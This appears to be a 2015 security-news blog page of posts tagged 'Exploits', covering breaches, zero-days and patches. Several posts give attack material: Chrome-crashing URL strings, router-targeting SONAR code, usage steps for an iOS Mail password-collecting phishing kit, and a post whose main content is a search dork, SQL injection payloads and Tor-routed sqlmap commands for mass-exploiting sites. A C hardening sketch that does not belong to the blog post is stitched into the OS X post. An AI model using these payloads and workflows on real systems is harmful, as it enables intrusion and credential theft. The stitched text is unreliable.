Showing posts with label Exploits. Show all posts

13 Million Users Data Breached Of Free Web Hosting Company 000Webhost


13 Million Users' Data, Including Plain-Text Passwords, Leaked From Free Web Hosting Company 000Webhost.

000webhost provides free PHP and MySQL web hosting. The leaked data includes user names and e-mail addresses.

Troy Hunt explained this breach in detail. According to the Forbes report:

Hunt discovered user accounts had their passwords reset, but without any direct notice to customers. When Hunt tried to log in with his own email address, an auto-generated response told him his password had been reset by 000Webhost "for security reasons", advising him to change his credentials before continuing. There was no public notification.

Users started to complain on the site forum that they could not access the FTP servers used to host their website files.

000webhost said on its Facebook page:

Hello,

We have witnessed a database breach on our main server.

What happened?
A hacker used an exploit in an old PHP version to upload some files, gaining access to our systems. Although the whole database has been compromised, we are mostly concerned about the leaked client information.

What did we do about it?
First of all, we removed all illegally uploaded pages as soon as we became aware of the breach. Next, we changed all the passwords and increased their encryption to avoid such mishaps in the future. A thorough investigation to make sure the breach does not exist anymore is in progress.

What do you need to do?
As all the passwords have been changed to random values, you now need to reset them. DO NOT USE YOUR PREVIOUS PASSWORD. PLEASE ALSO CHANGE YOUR PASSWORDS IF YOU USED THE SAME PASSWORD ANYWHERE ELSE.

Client Area Password
Please visit the Password Reminder tool at http://members.000webhost.com/forgot_password.php and enter your email address; the new password will be sent to your email. Afterwards, log in to your account with the new password and manually set a new, secure password at http://members.000webhost.com/edit_your_details.php

Hosting Account Password
To reset the password for your hosting account (and FTP), visit the "Change Account Password" section on the control panel and enter a new password there.

Email Account Password
Email account passwords should be changed by visiting the "Manage Email Accounts" section and clicking "Change password" for each email account.

MySQL User (Database) Password
MySQL user passwords are managed in the "MySQL" section on the control panel. In the "Action" field click "Change Password" and set a new password there.

We apologize for this hassle but it has to be done to ensure your data is safe. We are going to upgrade our systems step by step and will be aiming to be super-careful in future.

Regards,
000webhost Team


~ Wednesday 28 October 2015 0 comments

Another Zero Day Vulnerability Found In Adobe Flash


Another "Zero Day" Vulnerability Found In Adobe Flash

Researchers at Trend Micro found a zero-day exploit for the Adobe Flash plugin. The Flash zero-day affects the latest versions of Adobe Flash Player, 19.0.0.185 and 19.0.0.207.

According to Trend Micro, the Pawn Storm campaign is behind this attack; targets receive phishing e-mails containing links to the exploit. Trend Micro reported the following e-mail subject lines:

"Suicide car bomb targets NATO troop convoy Kabul"

“Syrian troops make gains as Putin defends air strikes”

“Israel launches airstrikes on targets in Gaza”

“Russia warns of response to reported US nuke buildup in Turkey, Europe”

“US military reports 75 US-trained rebels return Syria”

Affected Adobe Flash versions, according to Trend Micro

How Can We Protect Ourselves?

Trend Micro said it has sent a report to Adobe, but Adobe has still not patched this vulnerability.

~ Wednesday 14 October 2015 0 comments

Your Chrome Gets Crash By Using These String Code URL



We have tested these 16-character strings and they still work on Windows and Mac.

This security issue was found by Andris Atteka. Simply hovering the mouse over such a link is enough to crash Chrome.

The strings that trigger the flaw are:

http://a/%%30%30
file:///%%300
http://biome3d.com/%%30%30

He said in his blog:

"Recently I reported a crash bug in Google Chrome (issue #533361). This issue reminded me of the recent Skype vulnerability - both occur with simple URL strings. So how can you crash Google Chrome? By adding a NULL char in the URL string:

http://biome3d.com/%%30%30

Unfortunately no reward was awarded as this was deemed to be only a DOS vulnerability. Anyway, making secure software is much harder than finding issues in it. Thanks Google."

We hope Google will fix this issue soon.

~ Monday 21 September 2015 0 comments

Are You Using WhatsApp Web? Your Account Can Be Hacked


Are You Using WhatsApp Web? Your Account Can Be Hacked!

A major security flaw has been found in WhatsApp Web. The company recently announced 900 million users, and at least 200 million of them use the WhatsApp Web interface.

WhatsApp Web allows users to view any type of media or attachment that can be sent or viewed by the mobile platform/application. This includes images, videos, audio files, locations and contact cards. The vulnerability was found by Check Point security researcher Kasif Dekel.

It exploits the WhatsApp Web logic and allows attackers to trick victims into executing arbitrary code on their machines in a new and sophisticated way. All an attacker needed to do to exploit the vulnerability was to send a user a seemingly innocent vCard containing malicious code. Once opened, the supposed contact turns out to be an executable file, which can further compromise the computer by distributing bots, ransomware, RATs and other malware.

Kasif found that by manually intercepting and crafting XMPP requests to the WhatsApp servers, it was possible to control the file extension of the contact card file.

He changed the file extension to .BAT and sent it to the victim. Once the victim downloads and runs the file on the computer, the malicious code executes and can:

  • Take complete control over the target machine
  • Monitor user's activities
  • Use the target machine to spread viruses

The fields of the crafted XMPP request are:

  • NUMBER/GROUPID: the victim’s number or group ID
  • ID: the message ID
  • TIMESTAMP: the timestamp of the sender device
  • FILENAME: the VCARD file name, .exe
  • FILEDATA: the raw data of the file

This vulnerability was fixed within a week:

  • August 21, 2015 – vulnerability disclosed to the WhatsApp security team.
  • August 27, 2015 – WhatsApp rolls out fixed web clients (v0.1.4481).

The WhatsApp security team has verified and acknowledged the vulnerability and has rolled out an update fixing the issue in its web clients (v0.1.4481).

Source: Check Point

~ Wednesday 9 September 2015 0 comments

SONAR: A Framework For Identifying And Launching Exploits Against Internal Network Hosts


It works via WebRTC IP scanning combined with external resource fingerprinting.

How does it work?

Upon loading the sonar payload in a modern web browser the following will happen:
  • sonar will use WebRTC to scan the internal network for live hosts.
  • If a live host is found, sonar begins to fingerprint the host by linking to resources on it and hooking the onload event. If the expected resources load successfully, it triggers the pre-set JavaScript callback to start the user-supplied exploit.
  • If the user changes networks, sonar starts the process all over again on the newly joined network.

Fingerprints

Sonar works off of a database of fingerprints. A fingerprint is simply a list of known resources on a device that can be linked to and detected via onload. Examples of this include images, CSS stylesheets, and even external JavaScript.

An example fingerprint database can be seen below:

var fingerprints = [
    {
        'name': "ASUS RT-N66U",
        'fingerprints': ["/images/New_ui/asustitle.png","/images/loading.gif","/images/alertImg.png","/images/New_ui/networkmap/line_one.png","/images/New_ui/networkmap/lock.png","/images/New_ui/networkmap/line_two.png","/index_style.css","/form_style.css","/NM_style.css","/other.css"],
        'callback': function( ip ) {
            // Insert exploit here
        },
    },
    {
        'name': "Linksys WRT54G",
        'fingerprints': ["/UILinksys.gif","/UI_10.gif","/UI_07.gif","/UI_06.gif","/UI_03.gif","/UI_02.gif","/UI_Cisco.gif","/style.css"],
        'callback': function( ip ) {
            // Insert exploit here
        },
    },
]

The above database contains fingerprints for two devices, the ASUS RT-N66U WiFi router and the Linksys WRT54G WiFi router.

Each database entry has the following:

  • name: A field to identify what device the fingerprint is for. This could be something like HP Officejet 4500 printer or Linksys WRT54G Router.
  • fingerprints: An array of relative links to resources such as CSS stylesheets, images, or even JavaScript files. If you expect these resources to be on a non-standard port such as 8080, set the resource with the port included: :8080/unique.css. Keep in mind that using external resources with active content such as JavaScript is dangerous, as it can interrupt the regular flow of execution.
  • callback: If all of these resources are found to exist on the enumerated host, the callback function is called with a single argument: the device's IP address.

By creating your own fingerprints you can build custom exploits that will be launched against internal devices once they are detected by sonar. Common exploits include things such as Cross-site Request Forgery (CSRF), Cross-site Scripting (XSS), etc. The idea is that you can use these vulnerabilities to do things such as modifying router DNS configurations, dumping files from an internal fileserver, and more.

For an easier way to create fingerprints, see the following Chrome extension which generates fingerprint template code automatically for the page you're on:

Click Here to Install Chrome Extension



What can be done using sonar?

By using sonar a pentesting team can build web exploits against things such as internal logging servers, routers, printers, VOIP phones, and more. Because internal networks are often less guarded, attacks such as CSRF and XSS can be powerful ways to take over the configuration of devices on a host's internal network.

Download

~ Monday 24 August 2015 0 comments

PortDog: Port Scanning Tool In Python


PortDog is a network anomaly detector aimed at detecting port scanning techniques. It is written entirely in Python and has an easy-to-use interface.

It was tested on Ubuntu 15. Please note that it does not work on Windows OS, due to problems capturing raw packets. I am working on making this script work on both platforms. In future, I'm thinking about adding firewall options that could block malicious attempts. It uses raw packets for analysis; for this reason, please ensure that you run this script from a privileged session.


Usage:

sudo python portdog.py -t time_for_sniff_in_minutes

For example, if you want to detect for 5 minutes use:

sudo python portdog.py -t 5

For infinite detection use:

sudo python portdog.py -t 0

If you want to get the list of scanned ports, press CTRL+C at runtime to print the port list (if a scan has occurred).



~ Friday 14 August 2015 0 comments

Organizations Need To Be More Concerned About Their Security

Organizations Need To Be More Concerned About Their Security.

Nothing is secure! Yes, you heard it right. Today we point out some recent hacks.

From top-of-the-range cars to airplanes, all have been found vulnerable many times.

Supercar Tesla Model S Found Vulnerable
Starting with the recent hack of the Tesla Model S: two researchers found a vulnerability in the internal network of Tesla's dashboard, which they successfully penetrated with the help of software commands. They could even plant a trojan in the Model S' network and remotely disconnect its engine from the dashboard.

American Airlines And Sabre Systems
Now the same thing has happened to American Airlines: Chinese hackers have breached American Airlines and Sabre Systems and gained access to hundreds of airline reservations and thousands of hotels' data, though evidence has not yet been found.

Security Breach In Pentagon Computers
Another big breach was at the Pentagon: Russian hackers got access to the Pentagon's e-mail systems, affecting 4,000 Joint Chiefs of Staff personnel (both military and civilian), and the system has now been shut down for around two weeks.

Skateboards Also Compromised
And not only that: your skateboards are also being compromised. Recently, two security researchers, Healey and Mike Ryan, developed an exploit called FacePlant which can seize the device and take over control of electric skateboards; they presented their findings at the DEF CON conference held in Las Vegas.

Ashley Madison Dating Website Hacked
Ashley Madison Website Hacked: Hackers Want To Release 37 Million Users' Data. Ashley Madison is an online personals and dating site for casual encounters, married dating, discreet encounters and extramarital affairs.

Hacking Team Got Hacked
Italian Surveillance Company "Hacking Team" Got Hacked, 400GB Of Data Leaked Online! An Italian company that sells spying tools to government and law enforcement agencies has been hacked, with 400GB of internal documents, source code and e-mails leaked.

~ Monday 10 August 2015 0 comments

KdExploitMe: A Kernel Driver To Practice Writing Exploits


KdExploitMe: A kernel driver to practice writing exploits against, as well as some example exploits using public techniques.

The intent of this driver is to educate security testers on how memory corruption issues in Windows kernel drivers can be exploited. 

Knowing how to exploit security issues allows security testers to prove that bugs are exploitable, which can be used to convince developers to fix them. While these techniques can be used for evil, this driver is released in the hope that you will use this knowledge for good.

Download

~ Thursday 6 August 2015 0 comments

Wordpress Fixes Security Bugs And Updated New 4.2.4 Version


WordPress Fixes Security Bugs And Releases New 4.2.4 Version.

Many vulnerabilities in WordPress have been found by security researchers, and the good thing is that WordPress patches these vulnerabilities in a timely manner and ships a new updated version.

The 4.2.4 release addresses six issues, including three cross-site scripting vulnerabilities and a potential SQL injection that could be used to compromise a site.

WordPress 4.2.4 fixes three cross-site scripting vulnerabilities and a potential SQL injection that could be used to compromise a site (CVE-2015-2213).

It also includes a fix for a potential timing side-channel attack and prevents an attacker from locking a post from being edited.

To download WordPress 4.2.4, update automatically from the Dashboard > Updates menu in your site's admin area.

Download Wordpress

~ Wednesday 5 August 2015 0 comments

Untethered Jailbreak Your iOS 8.4 Devices Including MAC Version Available


The Chinese website TaiG has released a Mac version of its jailbreak for the latest iOS version, iOS 8.4. iPhone 6, 6 Plus, 5s, 5c, 5, 4s, all iPads and iPod touches are supported.

What is Jailbreak?
iOS jailbreaking is the process of removing the limitations on Apple devices running the iOS operating system through the use of software and hardware exploits – such devices include the iPhone, iPod touch, iPad, and second generation Apple TV. Jailbreaking permits root access to the iOS operating system, allowing the download of additional applications, extensions, and themes that are unavailable through the official Apple App Store.

How can you Jailbreak?

  • Download and install TaiG
  • Turn off your passcode (Settings > Passcode > Turn Passcode Off) and Find My iPhone (Settings > iCloud > Find My iPhone)
  • Plug in your phone to your computer, close iTunes (if it opened) and open the TaiG app
  • Start to jailbreak. Open TaiG Jailbreak Tool, and have your device connected to your computer.
  • Wait for TaiG to recognize your device, then uncheck the 3K assistant option
  • Click Start and wait for the software to jailbreak your device.

-> Back up your data before jailbreaking.

TaiG Jailbreak V2.4.3 supports untethered jailbreak of iOS 8.1.3 to iOS 8.4. Currently iOS 8.4 is relatively stable, so we strongly recommend that you update your device to iOS 8.4 with TaiG Pro before jailbreaking.

Download Taig Jailbreak Tool


~ 0 comments

Malvertising Hits 10 Million In 10 Days You Might Be Under Attack While Surfing The Web




Malvertising Hits 10 Million In 10 Days. 
You Might Be Under Attack While Surfing The Web.

Even many advertising companies didn't know that they were running malware ads.

How does it happen?
Advertisers contact advertising companies, and most of these companies don't check the advertising scripts that advertisers attach in the back-end. Websites are regularly victims of malvertising, and it infects their visitors, since attackers use these tricks to hide their malware inside advertisements.

Malvertising Example 1:



Malvertising Example 2:



According to Cyphort,

The malvertising attack is still going strong, using an SSL redirector at https://ads.us.e-planning.net.
In the last 10 days, Cyphort Labs found many more infected domains – they are listed below. Please refrain from going to these sites as they are dangerous.

We have notified e-planning.net about this issue and they are actively working to resolve it. At least 10 million people have visited these websites and were potentially exposed to the Angler exploit kit in the last 10 days according to our estimates and data from Similar Web.


How can we protect ourselves from malware ads?

By using AdBlock Plus.

  • Surf the web without annoying ads!
  • Can block tracking, malware domains, banners, pop-ups and video ads - even on Facebook and YouTube
  • Unobtrusive ads aren't blocked, in order to support websites (configurable)
  • It's free! (GPLv3)



~ Tuesday 28 July 2015 0 comments

Android Phones Can Be Hacked With Just A Text Message






Yes, you heard it right!


About 990 million Android phones could be hacked with just a simple text message. This is one of the biggest smartphone flaws ever found.

The security research company Zimperium claims to have found a bug that taps into the world's most popular mobile platform. The hack relies on a flaw in Stagefright, a core Android component and media playback service built into Android that is used to process, record and play multimedia files.

This security hole puts 990 million Android devices at risk, which is truly a huge number of smartphones. In 2014, more than 1 billion Android phones shipped throughout the world, according to research firm Strategy Analytics, which expects the number to go up in 2015 and beyond. Zimperium termed Stagefright the "Mother of all Android vulnerabilities". In this attack, the victim would not need to make any mistake such as opening an attachment or downloading a corrupt file. The malicious code would take over instantly, the moment you receive a text message; you may not even see anything.

Once the attackers get in, Drake says, they would be able to do anything: copy or delete data, or take control of your camera and microphone to monitor your every move. "It's really up to their imagination what they do once they get in," he said.

Joshua Drake, VP of platform research and exploitation at mobile security firm Zimperium, reported the flaw to Google earlier this year, but he said that most manufacturers have not yet made fixes available to their user base.

All the bugs have been assigned CVE numbers, which are used to identify severe vulnerabilities: CVE-2015-1538, CVE-2015-1539, CVE-2015-3824, CVE-2015-3826, CVE-2015-3827, CVE-2015-3828 and CVE-2015-3829. When the disclosure lands today, security researchers and attackers could have enough information to start working on exploits. Manufacturers have been requested to ship patches as soon as possible to protect their customers against this flaw.

Drake, who deserves much credit for his work in addressing and fixing the issues, will disclose even more information at the Black Hat and DEF CON security events taking place in Las Vegas next week.



~ Monday 27 July 2015 0 comments

Security Hole in Apple OS X Privilege Escalation Bug Found



Security Hole in Apple OS X: Privilege Escalation Bug Found By Security Researcher Stefan Esser.

Esser said the vulnerability is present in both the current 10.10.4 (Yosemite) version of OS X and the current beta version of 10.10.5.

Significantly, the current beta version of 10.11 is free of the flaw, evidence that Apple's developers may already be aware of the vulnerability. It wouldn't be surprising for the fix to find its way into an incremental update to OS X released in the coming weeks.

It's the type of security hole attackers regularly exploit to bypass security protections built into modern operating systems and applications.

Esser explained in his blog post:

When Apple changed the dynamic linker code for OS X 10.10 to support the new DYLD_PRINT_TO_FILE environment variable they added the following code directly to the _main function of dyld. As you can see from this code the value of the environment variable is directly used as filename for the opened or created logging file.

const char* loggingPath = _simple_getenv(envp, "DYLD_PRINT_TO_FILE");
if ( loggingPath != NULL ) {
        int fd = open(loggingPath, O_WRONLY | O_CREAT | O_APPEND, 0644);
        if ( fd != -1 ) {
                sLogfile = fd;
                sLogToFile = true;
        }
        else {
                dyld::log("dyld: could not open DYLD_PRINT_TO_FILE='%s', errno=%d\n", loggingPath, errno);
        }
}


The problem with this code is that it does not come with any safeguards that are required when adding new environment variables to the dynamic linker. Normally for security reasons the dynamic linker should reject all environment variables passed to it in case of restricted files. This is automatically handled when new environment variables are added to the process DyldEnvironmentVariable() function. However in the DYLD_PRINT_TO_FILE case the code was directly added to the _main function of dyld.


How can we protect?

Before going into the exploitation of this problem please be reminded that because it will likely take months for Apple to react to this issue we released a kernel extension that protects from this vulnerability by stopping all DYLD_ environment variables from being recognized by the dynamic linker for SUID root binaries. In addition to that it adds a mitigation against a common trick to circumvent O_APPEND restrictions on file descriptors.

Esser tweeted:




If you want to fix this vulnerability before Apple's update, here is how. Security researcher Esser explains how to mitigate this vulnerability on GitHub.

SUIDGuard - A kernel extension adding mitigations to protect SUID/SGID binaries

SUIDGuard is a TrustedBSD kernel driver that implements several mitigations to protect against weaknesses usually involving SUID/SGID binaries.

  • Protects SUID/SGID root binaries from DYLD_ environment variables by overwriting the string DYLD_ with XYLD_
  • Protects the O_APPEND flag usually used when opening e.g. logfiles from being disabled by someone with credentials that are different from those used to open the file
  • Tested with OS X Yosemite 10.10.4.
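Esser's point above is that the quoted dyld code makes no privileged-process check, and the SUIDGuard entry describes the DYLD_ to XYLD_ rewrite used to mitigate it. The C sketch below is an added example, not Apple's dyld source and not SUIDGuard's code: it shows the missing check in portable user-space form. The function names are assumptions, and comparing real and effective ids stands in for the issetugid() call dyld uses on OS X.

```c
/* Added example (not dyld or SUIDGuard code): the safeguard missing from the
 * DYLD_PRINT_TO_FILE handling, plus a user-space mirror of SUIDGuard's
 * "DYLD_" -> "XYLD_" rewrite. Names below are assumed for illustration. */
#include <fcntl.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* A process counts as "restricted" when its real and effective ids differ,
 * i.e. it was started from a SUID/SGID binary. dyld uses issetugid() for
 * this on OS X; the id comparison is the portable assumption made here. */
static bool is_restricted_process(void)
{
    return getuid() != geteuid() || getgid() != getegid();
}

/* Neutralise every DYLD_* variable in envp in place by rewriting its prefix
 * to XYLD_, the same substitution SUIDGuard is described as performing, so
 * that later lookups of DYLD_ names find nothing. Returns the count rewritten. */
static int scrub_dyld_env(char **envp, bool restricted)
{
    int rewritten = 0;
    if (!restricted || envp == NULL)
        return 0;
    for (char **p = envp; *p != NULL; p++) {
        if (strncmp(*p, "DYLD_", 5) == 0) {
            (*p)[0] = 'X';
            rewritten++;
        }
    }
    return rewritten;
}

/* Hardened counterpart of the quoted _main code: the log path still comes
 * from DYLD_PRINT_TO_FILE, but a restricted process refuses to honor it, so
 * a SUID root binary never opens a caller-chosen file with root rights.
 * Returns the open fd, or -1 when the variable is absent or refused. */
static int open_log_path(char **envp, bool restricted)
{
    static const char key[] = "DYLD_PRINT_TO_FILE=";
    const size_t keylen = sizeof(key) - 1;
    const char *path = NULL;

    for (char **p = envp; envp != NULL && *p != NULL; p++) {
        if (strncmp(*p, key, keylen) == 0) {
            path = *p + keylen;
            break;
        }
    }
    if (path == NULL || restricted)
        return -1;
    return open(path, O_WRONLY | O_CREAT | O_APPEND, 0644);
}

int main(void)
{
    /* Constructed sample environment, as an unprivileged caller could pass
     * it to a SUID binary. /dev/null keeps the demo free of side effects. */
    char var1[] = "DYLD_PRINT_TO_FILE=/dev/null";
    char var2[] = "PATH=/usr/bin:/bin";
    char *envp[] = { var1, var2, NULL };

    /* Treat the demo as restricted so the refusal path is exercised even
     * when run as a normal user; a real linker would use is_restricted_process(). */
    bool restricted = true || is_restricted_process();

    int fd = open_log_path(envp, restricted);
    printf("restricted open: fd=%d (refused)\n", fd);

    int n = scrub_dyld_env(envp, restricted);
    printf("rewrote %d variable(s); first entry is now \"%s\"\n", n, envp[0]);
    return 0;
}
```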



~ Thursday 23 July 2015 0 comments

Firefox Blocks Adobe Flash Player Plugin Due To Unpatched 3rd Zero Day Vulnerability




Firefox Blocks Adobe Flash Player Plugin Due To Unpatched 3rd Zero Day Vulnerability.

In some places users couldn't see videos due to the block. Exploits for these vulnerabilities were found in the data taken from Hacking Team in the breach revealed a week ago.

Adobe was expected to patch these Flash zero-days this week, but in the meantime all versions of the plugin were disabled.

Adobe released the 18.0.0.209 update for the Flash Player plugin today.

In the Mozilla statement:
"All versions of Adobe’s Flash Player plugin are currently deactivated by default, until Adobe releases an updated version to address known critical security issues."

Last week we reported that Hacking Team was hacked and 400GB of data leaked. These zero-days come from those leaks.

Firefox officially tweeted:


New Facebook Chief Security Officer (CSO) Alex Stamos tweeted:


In Adobe's statement:

"Security Advisory for Adobe Flash Player
Release date: July 10, 2015

Last Updated: July 12, 2015

Vulnerability identifier: APSA15-04

CVE number: CVE-2015-5122, CVE-2015-5123


Platform: Windows, Macintosh and Linux


Summary:

Critical vulnerabilities (CVE-2015-5122, CVE-2015-5123) have been identified in Adobe Flash Player 18.0.0.204 and earlier versions for Windows, Macintosh and Linux. Successful exploitation could cause a crash and potentially allow an attacker to take control of the affected system.  

Adobe is aware of reports that exploits targeting these vulnerabilities have been published publicly. Adobe expects to make updates available during the week of July 12, 2015."


When playing any Flash content in Firefox, the top of the browser window reads:

"Firefox has prevented the unsafe plugin 'Adobe Flash' from running on the target URL."



~ Tuesday 14 July 2015 0 comments

Hack iOS Mail App: Exploit Working [Video]


Hack iOS Mail App Credentials: Exploit Working [Video]  
iOS 8.3 Mail app injection kit!

This injection kit pwns every iOS 8.3 Mail app, and it was developed by Jan Soucek. He exploits a bug in the iOS Mail app that lets hackers send fake prompts to collect the user's password. So beware of prompts asking you to enter your password, and think twice before giving your iOS credentials.

Back in January 2015 Jan stumbled upon a bug in iOS's mail client, resulting in HTML tags in e-mail messages not being ignored.

This bug allows remote HTML content to be loaded, replacing the content of the original e-mail message. JavaScript is disabled in this UIWebView, but it is still possible to build a functional password "collector" using simple HTML and CSS.

It was filed under Radar #19479280 back in January, but the fix was not delivered in any of the iOS updates following 8.1.2. Therefore I decided to publish the proof of concept code here.

Demo:


Usage

  • Edit the e-mail address you would like to use for password collection in framework.php
  • Upload index.php, framework.php and mydata.txt to your server
  • Send an e-mail containing HTML code from e-mail.html to the research subject
  • Don't forget to change the modal-username GET parameter value to the e-mail address of the recipient
  • You can use https://putsmail.com for testing purposes


Credits
Framework7: Vladimir Kharlampidi (http://www.idangero.us/framework7) - Framework7's CSS code was used for the login dialog styling

License
MIT

Notes
The code detects that the research subject has already visited the page in the past (using cookies) and it stops displaying the password prompt to reduce suspicion.

The e-mail address and password are submitted via GET to framework.php, which then saves them to the mydata.txt file, sends them out via e-mail to the specified "collector" e-mail address and then returns the research subject back to Mail.app using redirect to message://dummy.

The password field has autofocus enabled. We then use focus detection to hide the login dialog once the password field loses its focus (e.g. after the subject clicks on OK and submits the password).

Download

~ Wednesday 10 June 2015 0 comments

Oops! Bug In Skype Crashed By Send Simple Word


Oops! Bug In Skype | Crashed By Sending A Simple Word

I just sent the message to my friend.
As you can see in the image, I typed "http://:" [without quotes] and sent it. After pressing enter it showed a pop-up with the message

"Skype has stopped working".


This is a bug in Skype, and Skype has confirmed it. If you are currently using Skype you can check the same.

Skype has now officially said that this bug has been fixed.

Solution:
Just install the latest version from http://www.skype.com/download for Android and iOS to get this bug fixed on your platform.

~ Wednesday 3 June 2015 0 comments

Router Exploitation Toolkit - REXT


A small toolkit for the easy creation and use of various Python scripts that work with embedded devices.


  • core - contains most of the toolkit's basic functions
  • databases - contains databases, like default credentials etc.
  • interface - contains the code used to create and manipulate the interface
  • modules - contains the structure of modules that can be loaded; every module contains vendor-specific sub-modules where scripts are stored:
  1. decryptors
  2. exploits
  3. harvesters
  4. misc
  5. scanners
  • output - output goes here

This is still heavy work in progress.


Requirements
Trying to keep the requirements minimal:

httplib2

License
This software is licensed under GNU GPL v3.

Download

~ 0 comments

Exploring CMS With SQLMap + INURL BR Mass


In this article we explore one SQLi pattern in a company's CMS. We use sqlmap for the SQL injection and the INURL scanner to find targets en masse.

For those not familiar with this tool: it was developed by HackersOnlineClub member Cleiton Pinheiro in order to automate detailed filters with search engines using special digital security search operators.

[+] Dork:      
intext:"Aadi" & inurl:"page.php?id="

[+] POC:      
http://www.target.com/page.php?id=1+XPL_SQLI

[+] Exploit:
DEBUGsqlmap  

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 1630=1630 AND 'DBoa'='DBoa
Vector: AND [INFERENCE]

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1' AND (SELECT 3932 FROM(SELECT COUNT(*),CONCAT(0x717a627671,(SELECT (ELT(3932=3932,1))),0x716a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'wUln'='wUln
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(10)))HrzP) AND 'jmET'='jmET
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

Type: UNION query

Title: Generic UNION query (NULL) - 5 columns
Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a627671,0x465169724a72556d4e4f,0x716a6b7071),NULL-- 

Vector: UNION ALL SELECT NULL,NULL,NULL,[QUERY],NULL--

[+] Login Page: 
http://www.test.com/admin

[+] EXPLORING WITH SQLMAP:
sqlmap.py -u 'http://www.target.com/page.php?id=1' -p id --random-agent --beep --level 3 --risk 2 --threads 2 --tor --check-tor --tor-type=SOCKS5 --dbs --dbms='Mysql' --time-sec 10 --batch

OUTPUT PRINT:

[+] EXPLORING WITH MASS INURLBR:
php inurlbr.php --dork 'intext:"Aadi" & inurl:"page.php?id="' -s aadi.txt  -q 1,6 --exploit-get "?&id=1%270x27" --command-vul "sqlmap.py -u '_TARGETFULL_' -p id --random-agent --beep --level 3 --risk 2 --threads 2 --tor --check-tor --tor-type=SOCKS5 --dbs --dbms='Mysql' --time-sec 10 --batch"

OUTPUT PRINT:


[+] Discoverer Author: Killer~X
[+] EMAIL: M_ox@hotmail.com
[+] FACEBOOK: http://www.fb.com/xXalreshyXx
[+] ASK: http://www.ask.fm/ALRESHY

Source:
http://www.exploit4arab.net/exploits/1486

~ Sunday 10 May 2015 0 comments

PixieWPS Offline Bruteforce WPS Pin Exploiting Tool


Pixiewps is a tool written in C used to brute-force the WPS PIN offline, exploiting the low or non-existent entropy of some APs (pixie dust attack).

It is meant for educational purposes only. All credits for the research go to Dominique Bongard.

DEPENDENCIES
Pixiewps requires libssl. To install it:

    sudo apt-get install libssl-dev

INSTALLATION
Pixiewps can be built and installed by running:

    ~/pixiewps$ cd src
    ~/pixiewps/src$ make
    ~/pixiewps/src$ sudo make install

USAGE

Usage: pixiewps

 Required Arguments:

    -e, --pke      : Enrollee public key
    -r, --pkr      : Registrar public key
    -s, --e-hash1  : E-Hash1
    -z, --e-hash2  : E-Hash2
    -a, --authkey  : Key used in HMAC SHA-256

 Optional Arguments:

    -n, --e-nonce  : Enrollee nonce
    -S, --dh-small : Small Diffie-Hellman keys (--pkr not needed)

    -h, --help     : Display this usage screen

Download

~ Monday 20 April 2015 0 comments

URL Redirection Vulnerability On PayPal Developers Website



URL Redirection Vulnerability On PayPal Developers Website.

Hi, my name is Rui Silva and I'm a 17-year-old security researcher from Portugal. I will explain how I found a URL redirection vulnerability on the PayPal subdomain developer.paypal.com!

Description:
[#] Title    : URL Redirection Vulnerability on PayPal Developers
[#] Status   : Unfixed/Duplicate
[#] Severity : Medium
[#] Works on : Chrome Version 41.0.2272.118 m

POC:

Steps to reproduce:
First sign up on the PayPal website.
After this go to: developer.paypal.com/developer/login?successRedirect=
In successRedirect= add http:/google.pt

Final URL: 
developer.paypal.com/developer/login?successRedirect=http:/google.pt

Now open this URL in a tab in the Chrome browser and press enter.
After pressing enter, sign in to your PayPal account and you will be redirected to the google.pt website.

After finding it I reported this to the PayPal Security Team.
One week later they replied to me.

PayPal Reply:



And after waiting... 1 or 2 hours later they replied to me again

Reply:





Thanks to all for your support!
I hope you enjoyed the article

Video:


The HOC Team congratulates Rui Silva for finding the bug.

~ Saturday 11 April 2015 0 comments